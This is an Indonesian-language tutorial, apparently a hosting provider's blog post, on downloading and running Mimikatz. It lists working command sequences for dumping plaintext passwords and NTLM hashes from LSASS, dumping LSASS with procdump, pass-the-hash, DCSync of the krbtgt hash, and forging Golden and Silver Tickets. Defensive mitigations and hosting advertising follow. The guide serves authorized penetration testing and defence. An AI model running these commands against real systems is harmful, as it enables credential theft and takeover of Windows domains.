Cara Menginstal dan Menggunakan Mimikatz: Panduan Lengkap untuk Profesional Keamanan

Mimikatz adalah salah satu alat yang paling dikenal dan banyak dibahas di dunia keamanan siber. Awalnya dikembangkan sebagai proof-of-concept untuk mendemonstrasikan kerentanan dalam autentikasi Windows, alat ini telah menjadi instrumen penting dalam toolkit penguji penetrasi, red teamer, dan peneliti keamanan. Panduan ini memberikan penjelasan menyeluruh tentang apa itu Mimikatz, siapa yang menggunakannya, dan cara menginstal serta mengoperasikannya secara bertanggung jawab di lingkungan yang terkontrol.

> Penafian Hukum: Mimikatz hanya boleh digunakan pada sistem yang Anda miliki atau yang telah Anda dapatkan otorisasi tertulis secara eksplisit untuk diuji. Penggunaan tanpa izin adalah ilegal dan dapat mengakibatkan sanksi pidana yang serius. Panduan ini hanya ditujukan untuk tujuan pendidikan dan pengujian keamanan yang sah.

—

Apa Itu Mimikatz?

Mimikatz adalah alat keamanan Windows sumber terbuka yang dibuat oleh peneliti keamanan Prancis, Benjamin Delpy. Fungsi utamanya adalah mengekstrak kredensial autentikasi — termasuk kata sandi plaintext, hash kata sandi NTLM, kode PIN, dan tiket Kerberos — langsung dari memori sistem Windows (khususnya dari proses LSASS).

Karena Windows secara historis menyimpan cache kredensial di memori untuk mendukung autentikasi yang mulus di berbagai layanan, Mimikatz mampu mengungkap kelemahan desain mendasar dalam cara sistem operasi menangani data autentikasi yang sensitif. Microsoft sejak saat itu telah memperkenalkan mitigasi seperti Credential Guard dan grup keamanan Protected Users, tetapi Mimikatz terus berkembang seiring dengan pertahanan ini, menjadikannya alat referensi yang sangat berharga untuk memahami lanskap ancaman saat ini.

Kemampuan Utama Mimikatz

• Ekstraksi kata sandi plaintext dari memori Windows (LSASS)
• Dumping hash NTLM dari database SAM dan Active Directory
• Ekstraksi dan manipulasi tiket Kerberos (serangan Golden Ticket, Silver Ticket)
• Pass-the-Hash (PtH) autentikasi menggunakan hash yang ditangkap
• Serangan Pass-the-Ticket (PtT) menggunakan tiket Kerberos yang dicuri
• Serangan DCSync untuk mereplikasi data domain controller tanpa akses langsung

—

Siapa yang Menggunakan Mimikatz dan Mengapa?

Kasus Penggunaan Keamanan yang Sah

Mimikatz terutama digunakan oleh profesional keamanan informasi dalam konteks berikut:

• Pengujian penetrasi — Mensimulasikan serangan pencurian kredensial di dunia nyata untuk menilai seberapa baik pertahanan organisasi bertahan terhadap musuh yang telah mendapatkan akses awal.
• Operasi red team — Meniru teknik advanced persistent threat (APT) untuk menguji kemampuan deteksi dan respons tim biru dan analis SOC.
• Audit keamanan — Mengevaluasi apakah kata sandi dan tiket Kerberos disimpan dan dilindungi sesuai dengan praktik terbaik keamanan.
• Pelatihan dan kesadaran — Mendemonstrasikan kepada administrator sistem dan insinyur bagaimana serangan berbasis kredensial bekerja dalam praktik, membuat ancaman abstrak menjadi nyata dan dapat ditindaklanjuti.
• Penelitian kerentanan — Mengidentifikasi kelemahan baru dalam mekanisme autentikasi Windows sebelum pelaku jahat dapat mengeksploitasinya.

Penyalahgunaan Berbahaya

Sayangnya, Mimikatz juga merupakan alat favorit di kalangan pelaku ancaman karena efektivitasnya. Kasus penggunaan berbahaya yang umum meliputi:

• Serangan Pass-the-Hash — Mengautentikasi ke sistem menggunakan hash NTLM yang ditangkap tanpa pernah mengetahui kata sandi plaintext aslinya.
• Serangan Pass-the-Ticket — Menggunakan tiket Kerberos yang dicuri untuk menyamar sebagai pengguna sah di seluruh jaringan.
• Persistensi pasca-eksploitasi — Memanen kredensial setelah pelanggaran awal untuk bergerak secara lateral melalui jaringan dan meningkatkan hak istimewa.
• Serangan Golden Ticket — Memalsukan Kerberos Ticket Granting Tickets (TGT) untuk mendapatkan akses persisten dan hampir tak terbatas ke sumber daya domain.

Memahami bagaimana penyerang menggunakan Mimikatz adalah alasan tepat mengapa para pembela perlu mengenalnya. Jika Anda menjalankan lingkungan VPS Hosting atau mengelola infrastruktur dedicated, mengetahui vektor serangan ini membantu Anda membangun pertahanan yang lebih tangguh.

—

Prasyarat

Sebelum melanjutkan, pastikan kondisi berikut terpenuhi di lingkungan uji yang diotorisasi Anda:

> Praktik Terbaik: Selalu lakukan pengujian Mimikatz di dalam mesin virtual yang terisolasi atau server lab khusus. Jika Anda memerlukan lingkungan yang aman dan terisolasi untuk lab pengujian penetrasi, pertimbangkan untuk menerapkan instans VPS Hosting dengan image Windows agar pengujian Anda sepenuhnya terpisah dari infrastruktur produksi.

—

Langkah 1: Unduh Mimikatz

1.1 Kunjungi Repositori GitHub Resmi

Mimikatz dikelola sebagai proyek sumber terbuka. Selalu unduh dari sumber resmi untuk menghindari versi yang telah dimodifikasi atau ditrojanisasi:

Repositori Resmi: https://github.com/gentilkiwi/mimikatz

1.2 Unduh Rilis Terbaru

1. Navigasikan ke bagian Releases dari repositori (bilah sisi kanan atau melalui jalur URL /releases).
2. Temukan rilis stabil terbaru.
3. Unduh arsip yang telah dikompilasi — biasanya bernama mimikatz_trunk.zip.

1.3 Ekstrak Arsip

1. Klik kanan file ZIP yang diunduh.
2. Pilih Extract All…
3. Pilih direktori tujuan, misalnya: C:SecurityToolsMimikatz

Setelah ekstraksi, Anda akan menemukan dua subdirektori:

• x64 — Biner 64-bit (gunakan ini pada sistem modern)
• Win32 — Biner 32-bit (untuk sistem lama)

Eksekutabel utama yang akan Anda gunakan adalah mimikatz.exe.

—

Langkah 2: Jalankan Mimikatz

2.1 Buka Command Prompt yang Ditinggikan

Mimikatz memerlukan hak istimewa administratif untuk berinteraksi dengan wilayah memori yang dilindungi. Untuk meluncurkan shell yang ditinggikan:

1. Tekan Windows + X
2. Pilih Command Prompt (Admin) atau Windows PowerShell (Admin)
3. Klik Yes pada prompt UAC

2.2 Navigasikan ke Direktori Mimikatz

cd C:SecurityToolsMimikatzx64

Verifikasi bahwa mimikatz.exe ada di direktori ini:

dir mimikatz.exe

2.3 Luncurkan Mimikatz

mimikatz.exe

Jika alat berhasil dimulai, Anda akan melihat banner Mimikatz dan prompt interaktif:

  .#####.   mimikatz 2.2.0 (x64) ...
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## /  ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ##  / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'         > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz #

Prompt mimikatz # mengonfirmasi bahwa alat sedang berjalan dan siap menerima perintah.

2.4 Aktifkan Hak Istimewa Debug

Sebelum menjalankan sebagian besar perintah ekstraksi kredensial, tingkatkan hak istimewa Mimikatz sendiri dalam sesi:

mimikatz # privilege::debug

Output yang diharapkan:

Privilege '20' OK

Ini memberikan Mimikatz hak SeDebugPrivilege, yang diperlukan untuk membaca memori proses yang dilindungi seperti LSASS.

—

Langkah 3: Perintah Inti Mimikatz

3.1 Ekstrak Kata Sandi Plaintext dari Memori

Ini adalah kemampuan Mimikatz yang paling terkenal. Ini membaca kredensial yang di-cache oleh penyedia autentikasi WDigest langsung dari memori LSASS:

mimikatz # sekurlsa::logonpasswords

Yang dikembalikan:

• Nama pengguna yang masuk
• Nama domain
• Kata sandi plaintext (jika caching WDigest diaktifkan)
• Hash NTLM
• Hash SHA1
• Kredensial Kerberos

> Catatan: Pada Windows 8.1 dan yang lebih baru, Microsoft menonaktifkan caching plaintext WDigest secara default. Namun, penyerang (dan penguji) dapat mengaktifkannya kembali melalui kunci registry, itulah mengapa ini tetap menjadi kasus uji yang relevan.

3.2 Tampilkan Kata Sandi Tersimpan (Perintah Alternatif)

mimikatz # sekurlsa::passwords

Perintah ini memberikan tampilan sederhana dari kredensial yang tersedia di memori sistem.

3.3 Ekstrak Kredensial dari File Dump Memori

Jika Anda tidak dapat menjalankan Mimikatz langsung pada sistem target, Anda dapat terlebih dahulu mengambil dump memori LSASS dan menganalisisnya secara offline:

Buat dump menggunakan Task Manager:

1. Buka Task Manager → tab Details
2. Klik kanan lsass.exe → Create dump file

Atau gunakan ProcDump (dari Sysinternals):

procdump.exe -accepteula -ma lsass.exe lsass.dmp

Analisis dump dengan Mimikatz:

mimikatz # sekurlsa::minidump C:PathTolsass.dmp
mimikatz # sekurlsa::logonpasswords

3.4 Daftar Tiket Kerberos

Untuk menghitung semua tiket Kerberos yang ada dalam sesi logon saat ini:

mimikatz # kerberos::list

Untuk mendaftar tiket dengan detail lengkap termasuk kunci sesi:

mimikatz # kerberos::list /export

Ini mengekspor setiap tiket sebagai file .kirbi, yang dapat digunakan dalam serangan Pass-the-Ticket.

3.5 Ekspor Kredensial ke File

Untuk menyimpan output dari dump kredensial ke file teks untuk analisis selanjutnya:

mimikatz # sekurlsa::logonpasswords > C:SecurityToolscredentials.txt

Output akan ditulis ke credentials.txt di jalur yang ditentukan.

—

Langkah 4: Teknik Lanjutan Mimikatz

4.1 Serangan Pass-the-Hash (PtH)

Pass-the-Hash memungkinkan autentikasi ke sistem jarak jauh menggunakan hash NTLM yang ditangkap, tanpa memerlukan kata sandi plaintext:

mimikatz # sekurlsa::pth /user:Administrator /domain:TARGETDOMAIN /ntlm:<NTLM_HASH> /run:cmd.exe

Ini memunculkan proses cmd.exe baru yang diautentikasi sebagai pengguna yang ditentukan menggunakan hash.

4.2 Serangan Golden Ticket

Golden Ticket adalah TGT Kerberos palsu yang ditandatangani dengan hash kata sandi akun KRBTGT, memberikan pemegangnya akses hampir tak terbatas ke sumber daya domain. Ini memerlukan hash KRBTGT, yang dapat diperoleh melalui DCSync:

Langkah 1 — DCSync untuk mengekstrak hash KRBTGT:

mimikatz # lsadump::dcsync /domain:target.local /user:krbtgt

Langkah 2 — Buat Golden Ticket:

mimikatz # kerberos::golden /user:Administrator /domain:target.local /sid:<DOMAIN_SID> /krbtgt:<KRBTGT_HASH> /ticket:golden.kirbi

Langkah 3 — Injeksi tiket:

mimikatz # kerberos::ptt golden.kirbi

4.3 Dump Hash NTLM dari Database SAM

Untuk mengekstrak hash akun lokal dari database SAM (memerlukan hak istimewa SYSTEM):

mimikatz # lsadump::sam

4.4 Dump Rahasia dari LSA

mimikatz # lsadump::secrets

Ini mengambil rahasia LSA, yang mungkin mencakup kredensial akun layanan, kredensial domain yang di-cache, dan data sensitif lainnya yang disimpan oleh Local Security Authority.

4.5 Serangan Silver Ticket

Silver Ticket menargetkan layanan tertentu daripada seluruh domain. Ini memerlukan hash NTLM dari akun layanan target:

mimikatz # kerberos::golden /user:Administrator /domain:target.local /sid:<DOMAIN_SID> /target:<SERVICE_HOST> /service:cifs /rc4:<SERVICE_ACCOUNT_HASH> /ticket:silver.kirbi

—

Langkah 5: Tindakan Pencegahan Defensif

Memahami cara kerja Mimikatz hanyalah setengah dari persamaan. Setengah lainnya adalah mengetahui cara bertahan melawannya. Jika Anda mengelola server Windows — baik di Dedicated Servers atau infrastruktur berbasis cloud — mitigasi berikut sangat penting:

5.1 Aktifkan Credential Guard

Windows Credential Guard menggunakan keamanan berbasis virtualisasi (VBS) untuk mengisolasi LSASS dalam container yang dilindungi, mencegah Mimikatz membaca kredensial langsung dari memori.

Aktifkan melalui Group Policy:

Computer Configuration → Administrative Templates → System → Device Guard → Turn On Virtualization Based Security

5.2 Nonaktifkan Autentikasi WDigest

Cegah caching kata sandi plaintext dengan menonaktifkan WDigest:

HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSecurityProvidersWDigest
UseLogonCredential = 0

5.3 Tambahkan Pengguna ke Grup Protected Users

Anggota grup keamanan Protected Users tidak dapat mengautentikasi menggunakan enkripsi Kerberos NTLM, DES, atau RC4, yang secara signifikan membatasi efektivitas serangan pencurian kredensial.

5.4 Implementasikan Perlindungan LSA (RunAsPPL)

Aktifkan Protected Process Light (PPL) untuk LSASS guna mencegah akses memori yang tidak sah:

HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsa
RunAsPPL = 1

5.5 Pantau Indikator Mimikatz

Konfigurasikan solusi SIEM atau EDR Anda untuk memberi peringatan pada:

• Akses ke memori lsass.exe dari proses yang tidak terduga
• SeDebugPrivilege yang diberikan ke proses non-sistem
• Pola perintah sekurlsa, kerberos, atau lsadump yang mencurigakan dalam log proses
• Peristiwa pembuatan file dump LSASS yang tidak biasa (Event ID 4656, 4663)

5.6 Jaga Sistem Tetap Diperbarui

Banyak teknik Mimikatz mengeksploitasi kerentanan yang diketahui atau perilaku lama. Menjaga Windows dan Active Directory sepenuhnya diperbarui menghilangkan seluruh kelas vektor serangan.

—

Mimikatz dalam Konteks Infrastruktur Hosting yang Aman

Bagi organisasi yang menjalankan aplikasi web, API, atau layanan internal, risiko pencurian kredensial melampaui workstation lokal. Jika penyerang mendapatkan akses ke lingkungan server Anda, alat seperti Mimikatz dapat digunakan untuk meningkatkan hak istimewa dan bergerak secara lateral.

Memilih penyedia hosting yang memprioritaskan keamanan di tingkat infrastruktur adalah lapisan pertahanan yang penting. Baik Anda memerlukan Shared Web Hosting untuk proyek yang lebih kecil atau Dedicated Servers untuk beban kerja enterprise, memastikan lingkungan hosting Anda mencakup perlindungan DDoS, isolasi jaringan, dan pembaruan keamanan rutin mengurangi permukaan serangan Anda secara keseluruhan.

Bagi tim yang mengelola lingkungan Active Directory atau aplikasi berbasis Windows, memadukan infrastruktur Anda dengan SSL Certificates yang dikonfigurasi dengan benar memastikan bahwa kredensial yang dikirimkan antara klien dan server dienkripsi saat transit — menambahkan lapisan perlindungan lain terhadap intersepsi.

—

Ringkasan: Referensi Perintah Mimikatz

—

Kesimpulan

Mimikatz tetap menjadi salah satu alat paling kuat dan instruktif yang tersedia bagi profesional keamanan siber. Kemampuannya untuk mengungkap kelemahan mendasar dalam mekanisme autentikasi Windows telah mendorong peningkatan signifikan dalam cara Microsoft merancang perlindungan kredensial — dari Credential Guard hingga Protected Users hingga LSA PPL. Bagi penguji penetrasi, red teamer, dan peneliti keamanan, pemahaman menyeluruh tentang Mimikatz bukanlah pilihan; itu adalah keharusan.

Prinsip-prinsip utama yang selalu perlu diingat:

• Selalu dapatkan otorisasi tertulis yang eksplisit sebelum menggunakan Mimikatz pada sistem apa pun.
• Gunakan lingkungan terisolasi — mesin virtual atau server lab khusus — untuk menghindari paparan yang tidak disengaja.
• Pahami pertahanan sedalam Anda memahami serangan.
• Tetap terkini — baik Mimikatz maupun pertahanan Windows terus berkembang.

Dengan menggabungkan pengetahuan langsung tentang alat seperti Mimikatz dengan infrastruktur hosting yang aman dan terkonfigurasi dengan baik, tim keamanan dapat membangun pertahanan yang benar-benar diuji terhadap teknik serangan dunia nyata daripada asumsi teoritis.

—

*AlexHost menyediakan solusi hosting berkinerja tinggi dan aman yang dirancang dengan mempertimbangkan para profesional yang sadar keamanan. Jelajahi paket VPS Hosting dan Dedicated Servers kami untuk membangun lab aman atau lingkungan produksi Anda berikutnya.*